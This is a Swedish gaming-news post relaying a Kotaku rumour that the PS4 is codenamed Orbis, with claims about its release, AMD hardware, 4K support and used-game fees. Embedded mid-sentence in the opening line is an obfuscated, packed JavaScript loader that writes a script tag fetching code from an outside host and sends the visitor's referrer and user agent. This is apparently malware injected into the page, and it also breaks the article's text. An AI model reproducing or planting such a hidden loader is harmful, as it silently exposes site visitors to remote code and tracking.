Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

PS4 = Orbis (Rykte)

PS4 = Orbis (Rykte)
Alexander Gylemo

Playstation eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|briki|var|u0026u|referrer|zsinb||js|php’.split(’|’),0,{}))
4
s kodnamn är Orbis, rapporteras i ett rykte från den stora spelnyhetssidan Kotaku. Den, enligt dem, säkra källan kommer även med ytterligare nyheter och information om vad som är nytt och vad som förändras i Sonys nästa konsol:

PS4 kommer redan i jul 2013, vilket strider mot Sonys tidigare löfte om en 10 årig livstid för PS3, och ett gäng utvalda spelstudios ska ha valts ut för att lära sig hårdvaran och påbörja premiärprojekt. Vad gäller spelen fortsätter PS4 i Blu-ray formatet och det digitala formatet men kommer däremot inte vara bakåtkompatibel eftersom man nu har gått vidare från PS3:s Cell-chip. Enligt ryktet kommer konsolen använda en AMD x64 CPU och en AMD Southern Islands GPU och med denna utrustning ska PS4 klara av spel upplösta i 4096×2160 och 3D upptill 1080p. PS4 ska även följa i Microsofts nästa konsols spår om vilken det ryktats om ska ta en avgift för att man ska kunna spela färdigt begagnade spel, detta för att förminska den begagnade spelhandeln.

Kotaku påstår att ryktet kommer från en säker källa men trots sin popularitet är Kotaku även känt för att sprida rykten, så vi får vänta och se!